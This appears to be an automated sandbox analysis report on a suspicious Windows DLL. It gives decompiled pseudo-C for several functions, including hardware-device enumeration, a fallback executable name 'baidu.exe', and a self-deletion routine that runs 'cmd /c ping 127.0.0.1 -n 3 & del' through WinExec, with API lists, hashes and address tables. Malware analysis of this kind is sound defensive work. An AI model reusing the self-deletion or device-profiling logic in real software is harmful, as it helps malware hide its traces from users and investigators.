                                                                                                                                                                  0x1001b7f2
                                                                                                                                                                  0x1001b808
                                                                                                                                                                  0x1001b813
                                                                                                                                                                  0x1001b818
                                                                                                                                                                  0x1001b81e
                                                                                                                                                                  0x1001b848
                                                                                                                                                                  0x1001b84b
                                                                                                                                                                  0x1001b84e
                                                                                                                                                                  0x1001b855
                                                                                                                                                                  0x1001b886
                                                                                                                                                                  0x1001b897
                                                                                                                                                                  0x1001b89e
                                                                                                                                                                  0x1001b8ca
                                                                                                                                                                  0x1001b8dc
                                                                                                                                                                  0x1001b8e3
                                                                                                                                                                  0x1001b8ec
                                                                                                                                                                  0x1001b8f5
                                                                                                                                                                  0x1001b8fe
                                                                                                                                                                  0x1001b907
                                                                                                                                                                  0x1001b910
                                                                                                                                                                  0x1001b919
                                                                                                                                                                  0x1001b922
                                                                                                                                                                  0x1001b930
                                                                                                                                                                  0x1001b935
                                                                                                                                                                  0x1001b93a
                                                                                                                                                                  0x1001b95d
                                                                                                                                                                  0x1001b96f
                                                                                                                                                                  0x1001b97d
                                                                                                                                                                  0x1001b983
                                                                                                                                                                  0x1001b98d
                                                                                                                                                                  0x1001b9a0
                                                                                                                                                                  0x1001b9a5
                                                                                                                                                                  0x1001b9aa
                                                                                                                                                                  0x1001b9bc
                                                                                                                                                                  0x1001b9bf
                                                                                                                                                                  0x1001b9c2
                                                                                                                                                                  0x1001b9df
                                                                                                                                                                  0x1001b9c4
                                                                                                                                                                  0x1001b9cc
                                                                                                                                                                  0x1001b9d1
                                                                                                                                                                  0x1001b9d7
                                                                                                                                                                  0x1001b9d7
                                                                                                                                                                  0x1001b9ea
                                                                                                                                                                  0x1001b9ef
                                                                                                                                                                  0x1001b9f4
                                                                                                                                                                  0x1001b9ff
                                                                                                                                                                  0x1001ba04
                                                                                                                                                                  0x1001ba09
                                                                                                                                                                  0x1001ba14
                                                                                                                                                                  0x1001ba19
                                                                                                                                                                  0x1001ba1e
                                                                                                                                                                  0x1001ba2b
                                                                                                                                                                  0x1001ba87
                                                                                                                                                                  0x1001ba8e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba8e
                                                                                                                                                                  0x1001ba34
                                                                                                                                                                  0x1001ba7f
                                                                                                                                                                  0x1001ba82
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba82
                                                                                                                                                                  0x1001ba41
                                                                                                                                                                  0x1001ba4f
                                                                                                                                                                  0x1001ba56
                                                                                                                                                                  0x1001ba68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba68
                                                                                                                                                                  0x1001ba5d
                                                                                                                                                                  0x1001ba93
                                                                                                                                                                  0x1001ba97
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba20
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba0b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b9f6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b9ac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b93c
                                                                                                                                                                  0x1001b8af
                                                                                                                                                                  0x1001b8b7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b8bd
                                                                                                                                                                  0x1001b868
                                                                                                                                                                  0x1001b86b
                                                                                                                                                                  0x1001b86e
                                                                                                                                                                  0x1001b875
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b879
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b87f
                                                                                                                                                                  0x1001b825
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b82b
                                                                                                                                                                  0x1001b76a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b770
                                                                                                                                                                  0x1001b74d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b753
                                                                                                                                                                  0x1001b72c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b732
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b709
                                                                                                                                                                  0x1001b6df
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b6e5
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B69E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 1001B6A5
                                                                                                                                                                    • Part of subcall function 1001AEA0: SetLastError.KERNEL32(0000000D,?,1001B6B9,10020924,00000040), ref: 1001AEAD
                                                                                                                                                                  • SetLastError.KERNEL32(000000C1), ref: 1001B6DF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                  • API String ID: 1762409328-192647395
                                                                                                                                                                  • Opcode ID: 3eee6498037c2fe8ffe83811f43bb82ec4f96475871352c36a7dddd69a664305
                                                                                                                                                                  • Instruction ID: 694ab680ebfe8ef0636185c130ad71dc1cebcbc5687b108a2a2fd76037c7b5c4
                                                                                                                                                                  • Opcode Fuzzy Hash: 3eee6498037c2fe8ffe83811f43bb82ec4f96475871352c36a7dddd69a664305
                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE1F874A00609DFDB04CFA4C884AAEBBB1FF88305F648558E905AF385D774E982CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000E96E, Relevance: 25.6, APIs: 17, Instructions: 90memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                  			E1000E96E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033548c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10335494 = (_t20 << 8) + _t39;
						 *0x10335498 = _t20;
						 *0x1033549c = _t39;
						 *0x10335490 = _t47;
						_t21 = E1000F81F(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E10011936(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E100150E1();
								 *0x10338f64 = GetCommandLineA();
								 *0x103352fc = E10014FAC(); // executed
								_t27 = E100149F4(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014EF3(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014C34();
										goto L10;
									} else {
										_t32 = E10014C80(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E10011BD6(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103352f8 =  *0x103352f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E10011620();
									goto L8;
								}
							} else {
								L8:
								E1000F879();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}



















                                                                                                                                                                  0x1000e96e
                                                                                                                                                                  0x1000e985
                                                                                                                                                                  0x1000e989
                                                                                                                                                                  0x1000e993
                                                                                                                                                                  0x1000e995
                                                                                                                                                                  0x1000e99b
                                                                                                                                                                  0x1000e99d
                                                                                                                                                                  0x1000e99e
                                                                                                                                                                  0x1000e9a0
                                                                                                                                                                  0x1000e9b3
                                                                                                                                                                  0x1000e9b9
                                                                                                                                                                  0x1000e9bf
                                                                                                                                                                  0x1000e9c2
                                                                                                                                                                  0x1000e9cb
                                                                                                                                                                  0x1000e9d1
                                                                                                                                                                  0x1000e9d4
                                                                                                                                                                  0x1000e9d7
                                                                                                                                                                  0x1000e9d9
                                                                                                                                                                  0x1000e9d9
                                                                                                                                                                  0x1000e9d9
                                                                                                                                                                  0x1000e9df
                                                                                                                                                                  0x1000e9e2
                                                                                                                                                                  0x1000e9e7
                                                                                                                                                                  0x1000e9ef
                                                                                                                                                                  0x1000e9f3
                                                                                                                                                                  0x1000e9f9
                                                                                                                                                                  0x1000e9fe
                                                                                                                                                                  0x1000ea04
                                                                                                                                                                  0x1000ea0a
                                                                                                                                                                  0x1000ea0f
                                                                                                                                                                  0x1000ea11
                                                                                                                                                                  0x1000ea12
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea18
                                                                                                                                                                  0x1000ea18
                                                                                                                                                                  0x1000ea1d
                                                                                                                                                                  0x1000ea1f
                                                                                                                                                                  0x1000ea2b
                                                                                                                                                                  0x1000ea36
                                                                                                                                                                  0x1000ea40
                                                                                                                                                                  0x1000ea45
                                                                                                                                                                  0x1000ea4a
                                                                                                                                                                  0x1000ea4c
                                                                                                                                                                  0x1000ea55
                                                                                                                                                                  0x1000ea5a
                                                                                                                                                                  0x1000ea5c
                                                                                                                                                                  0x1000ea7e
                                                                                                                                                                  0x1000ea7e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea5e
                                                                                                                                                                  0x1000ea5e
                                                                                                                                                                  0x1000ea63
                                                                                                                                                                  0x1000ea65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea67
                                                                                                                                                                  0x1000ea69
                                                                                                                                                                  0x1000ea6e
                                                                                                                                                                  0x1000ea71
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea73
                                                                                                                                                                  0x1000ea73
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000ea71
                                                                                                                                                                  0x1000ea65
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea1f
                                                                                                                                                                  0x1000e9a2
                                                                                                                                                                  0x1000e9a5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000e9a5
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000eb31

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2870529951-0
                                                                                                                                                                  • Opcode ID: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
                                                                                                                                                                  • Instruction ID: 8b665d2d90db9d313c13c33d8a46f5d936d5b37bcfbd2c7c3b96e787307a2e84
                                                                                                                                                                  • Opcode Fuzzy Hash: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 4731C875A043518FF350DFB58DC161A37E8FF49381F228429E909DB256EB30EC818B51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A2C0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A2C0() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF80(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF80(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CCA3(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}









                                                                                                                                                                  0x1001a2c9
                                                                                                                                                                  0x1001a2de
                                                                                                                                                                  0x1001a2e6
                                                                                                                                                                  0x1001a2fb
                                                                                                                                                                  0x1001a311
                                                                                                                                                                  0x1001a32a
                                                                                                                                                                  0x1001a33b
                                                                                                                                                                  0x1001a344

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A31E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                                  • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                                  • API String ID: 2874319085-10483710
                                                                                                                                                                  • Opcode ID: f420551fc850474c97d40147a8eae288538b5e405040515d23e53dac240480c4
                                                                                                                                                                  • Instruction ID: dfe06c4bab66860014fe570f5f0bb2c2abbb8c4bd71063b777625ae051172b46
                                                                                                                                                                  • Opcode Fuzzy Hash: f420551fc850474c97d40147a8eae288538b5e405040515d23e53dac240480c4
                                                                                                                                                                  • Instruction Fuzzy Hash: A9F04F7998431C66E720D760EC8AFE9773CAB24704F4405D4F6986A1C5EEF467CC8BA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A660, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E1001A660(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);
				_push(E1002315C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10025ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF80(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A1D0( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CCA3(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A4E0(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001AB0( &_v52, _t81, _v20);
					E10001AB0( &_v52, _t81, ".exe");
					_push(_v20);
					E1000CA40(__ebx, _t71, __esi, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001AB0( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}






















                                                                                                                                                                  0x1001a660
                                                                                                                                                                  0x1001a660
                                                                                                                                                                  0x1001a663
                                                                                                                                                                  0x1001a665
                                                                                                                                                                  0x1001a670
                                                                                                                                                                  0x1001a671
                                                                                                                                                                  0x1001a67e
                                                                                                                                                                  0x1001a690
                                                                                                                                                                  0x1001a695
                                                                                                                                                                  0x1001a69c
                                                                                                                                                                  0x1001a6b1
                                                                                                                                                                  0x1001a6c7
                                                                                                                                                                  0x1001a6d4
                                                                                                                                                                  0x1001a6dc
                                                                                                                                                                  0x1001a6df
                                                                                                                                                                  0x1001a6e5
                                                                                                                                                                  0x1001a6e8
                                                                                                                                                                  0x1001a6eb
                                                                                                                                                                  0x1001a6ee
                                                                                                                                                                  0x1001a6f1
                                                                                                                                                                  0x1001a6f5
                                                                                                                                                                  0x1001a705
                                                                                                                                                                  0x1001a719
                                                                                                                                                                  0x1001a71c
                                                                                                                                                                  0x1001a720
                                                                                                                                                                  0x1001a729
                                                                                                                                                                  0x1001a736
                                                                                                                                                                  0x1001a73e
                                                                                                                                                                  0x1001a73f
                                                                                                                                                                  0x1001a744
                                                                                                                                                                  0x1001a74a
                                                                                                                                                                  0x1001a74f
                                                                                                                                                                  0x1001a751
                                                                                                                                                                  0x1001a75b
                                                                                                                                                                  0x1001a75b
                                                                                                                                                                  0x1001a767
                                                                                                                                                                  0x1001a775
                                                                                                                                                                  0x1001a77b
                                                                                                                                                                  0x1001a785
                                                                                                                                                                  0x1001a790
                                                                                                                                                                  0x1001a79a

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A1D0: FindFirstFileA.KERNEL32(1001A6D9,?), ref: 1001A1EE
                                                                                                                                                                    • Part of subcall function 1001A1D0: FindClose.KERNEL32(000000FF), ref: 1001A216
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: .exe$baidu.exe
                                                                                                                                                                  • API String ID: 3164538923-2273953317
                                                                                                                                                                  • Opcode ID: 08d08622395ad553d42a9c19a3d1865530d992bc95af371e2ab3d3718ce9d517
                                                                                                                                                                  • Instruction ID: e55bd592b59adb37ad85060a3931d0354643b17087754827cff962c307c3447c
                                                                                                                                                                  • Opcode Fuzzy Hash: 08d08622395ad553d42a9c19a3d1865530d992bc95af371e2ab3d3718ce9d517
                                                                                                                                                                  • Instruction Fuzzy Hash: 56315BB5C10258ABEB04DBA0ED85FEEB7B4FF09740F400169F519A6281EB746A48CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100199C0, Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 33%
                                                                                                                                                                  			E100199C0(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v312;
				char _v572;
				char _v832;
				char _v1092;
				char _v1352;
				char _v1368;
				char _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				signed int _v1384;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t74;
				intOrPtr _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t97;
				void* _t116;
				signed int _t150;
				void* _t164;
				void* _t168;
				void* _t171;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t203;

				_t116 = __ebx;
				 *[fs:0x0] = _t187;
				_t188 = _t187 - 0x558;
				_v1384 = 0;
				_t74 = E100031F0( &_v1368, __eflags);
				_v8 = 0;
				_v1376 = 0;
				_v48 = 0;
				_v1372 = 0;
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E1002314A, 0xffffffff); // executed
				_v1380 = _t74;
				if(_v1380 != 0xffffffff) {
					E1000CF80(_t164,  &_v44, 0, 0x1c);
					_t189 = _t188 + 0xc;
					_v44 = 0x1c;
					while(1) {
						_t148 = _v1376;
						_t80 = _v1380;
						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
						if(_t80 == 0) {
							break;
						}
						E1000CF80(_t164,  &_v1352, 0, 0x514);
						_push( &_v1372);
						_push( &_v48);
						_push(0);
						_t191 = _t189 + 0xc - 0x1c;
						_t182 =  &_v44;
						memcpy(_t191, _t182, 7 << 2);
						_t168 = _t182 + 0xe;
						_push(_v1380); // executed
						_t85 = E100197E0(_t116, _t182); // executed
						_t193 = _t191 + 0x38;
						_t213 = _t85;
						if(_t85 != 0) {
							E1000D1F0(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t168, _t182, _t213);
							_t193 = _t193 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(7);
						_t194 = _t193 - 0x1c;
						_t183 =  &_v44;
						memcpy(_t194, _t183, 7 << 2);
						_t171 = _t183 + 0xe;
						_push(_v1380); // executed
						_t88 = E100197E0(_t116, _t183); // executed
						_t196 = _t194 + 0x38;
						_t214 = _t88;
						if(_t88 != 0) {
							E1000D1F0(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t171, _t183, _t214);
							_t196 = _t196 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0x16);
						_t197 = _t196 - 0x1c;
						_t184 =  &_v44;
						memcpy(_t197, _t184, 7 << 2);
						_t174 = _t184 + 0xe;
						_push(_v1380); // executed
						_t91 = E100197E0(_t116, _t184); // executed
						_t199 = _t197 + 0x38;
						_t215 = _t91;
						if(_t91 != 0) {
							E1000D1F0(_t116, _t174, _t184,  &_v832, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t174, _t184, _t215);
							_t199 = _t199 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0xc);
						_t200 = _t199 - 0x1c;
						_t185 =  &_v44;
						memcpy(_t200, _t185, 7 << 2);
						_t177 = _t185 + 0xe;
						_push(_v1380); // executed
						_t94 = E100197E0(_t116, _t185); // executed
						_t202 = _t200 + 0x38;
						_t216 = _t94;
						if(_t94 != 0) {
							E1000D1F0(_t116, _t177, _t185,  &_v572, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t177, _t185, _t216);
							_t202 = _t202 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(8);
						_t203 = _t202 - 0x1c;
						_t186 =  &_v44;
						memcpy(_t203, _t186, 7 << 2);
						_t164 = _t186 + 0xe;
						_push(_v1380); // executed
						_t97 = E100197E0(_t116, _t186); // executed
						_t189 = _t203 + 0x38;
						_t217 = _t97;
						if(_t97 != 0) {
							E1000D1F0(_t116, _t164, _t186,  &_v312, _v48, _v1372);
							_push(_v48);
							E1000CA40(_t116, _t164, _t186, _t217);
							_t189 = _t189 + 0x10;
						}
						_v1376 = _v1376 + 1;
						E10003390( &_v1368,  &_v1352, _t217,  &_v1352);
					}
					__imp__SetupDiDestroyDeviceInfoList(_v1380); // executed
				}
				E10003220(_a4, _t148, __eflags,  &_v1368);
				_t150 = _v1384 | 0x00000001;
				__eflags = _t150;
				_v1384 = _t150;
				_v8 = 0xffffffff;
				E10003300( &_v1368); // executed
				 *[fs:0x0] = _v16;
				return _a4;
			}




















































                                                                                                                                                                  0x100199c0
                                                                                                                                                                  0x100199d1
                                                                                                                                                                  0x100199d8
                                                                                                                                                                  0x100199e0
                                                                                                                                                                  0x100199f0
                                                                                                                                                                  0x100199f5
                                                                                                                                                                  0x100199fc
                                                                                                                                                                  0x10019a06
                                                                                                                                                                  0x10019a0d
                                                                                                                                                                  0x10019a1f
                                                                                                                                                                  0x10019a25
                                                                                                                                                                  0x10019a32
                                                                                                                                                                  0x10019a40
                                                                                                                                                                  0x10019a45
                                                                                                                                                                  0x10019a48
                                                                                                                                                                  0x10019a4f
                                                                                                                                                                  0x10019a53
                                                                                                                                                                  0x10019a5a
                                                                                                                                                                  0x10019a61
                                                                                                                                                                  0x10019a69
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10019a7d
                                                                                                                                                                  0x10019a8b
                                                                                                                                                                  0x10019a8f
                                                                                                                                                                  0x10019a90
                                                                                                                                                                  0x10019a92
                                                                                                                                                                  0x10019a9a
                                                                                                                                                                  0x10019a9f
                                                                                                                                                                  0x10019a9f
                                                                                                                                                                  0x10019aa7
                                                                                                                                                                  0x10019aa8
                                                                                                                                                                  0x10019aad
                                                                                                                                                                  0x10019ab0
                                                                                                                                                                  0x10019ab2
                                                                                                                                                                  0x10019ac6
                                                                                                                                                                  0x10019ad1
                                                                                                                                                                  0x10019ad2
                                                                                                                                                                  0x10019ad7
                                                                                                                                                                  0x10019ad7
                                                                                                                                                                  0x10019ae0
                                                                                                                                                                  0x10019ae4
                                                                                                                                                                  0x10019ae5
                                                                                                                                                                  0x10019ae7
